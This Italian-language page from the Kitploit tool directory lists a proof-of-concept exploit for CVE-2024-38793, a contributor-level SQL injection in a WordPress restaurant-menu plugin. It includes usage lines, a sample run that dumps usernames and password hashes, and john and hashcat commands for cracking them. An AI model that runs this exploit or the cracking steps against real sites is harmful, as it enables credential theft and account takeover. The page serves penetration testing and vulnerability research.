Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-38793-PoC — Codice Proof of Concept per lo sfruttamento di CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - SQL Injection autenticata (Contributor+)) | Kitploit
Strumenti/GitHubGitHub/ret2desync/cve-2024-38793-poc
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubret2desync/cve-2024-38793-poc

CVE-2024-38793-PoC

Codice Proof of Concept per lo sfruttamento di CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - SQL Injection autenticata (Contributor+))

Vedi Repository
72 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-38793-PoC

Codice di prova di concetto per lo sfruttamento di CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - SQL Injection autenticata (Contributor+)).

Prova di concetto

Questa è una prova di concetto per lo sfruttamento della vulnerabilità CVE-2024-38793, una vulnerabilità di SQL injection presente nelle versioni del plugin WordPress Best Restaurant Menu a.k.a Great Restaurant Menu WP precedenti alla 1.4.2.

La vulnerabilità si verifica a causa della mancanza di sanitizzazione dell'input sull'argomento groups quando si utilizza lo shortcode brm_restaurant_menu.

Nota: sono necessarie le credenziali di un utente con privilegi almeno di livello Contributor.

Il codice tenterà di recuperare gli username e gli hash delle password dalla tabella degli utenti di WordPress.

Utilizzo

root@kitploit:~
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

Esempio di esecuzione

root@kitploit:~
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
Scarica lo strumento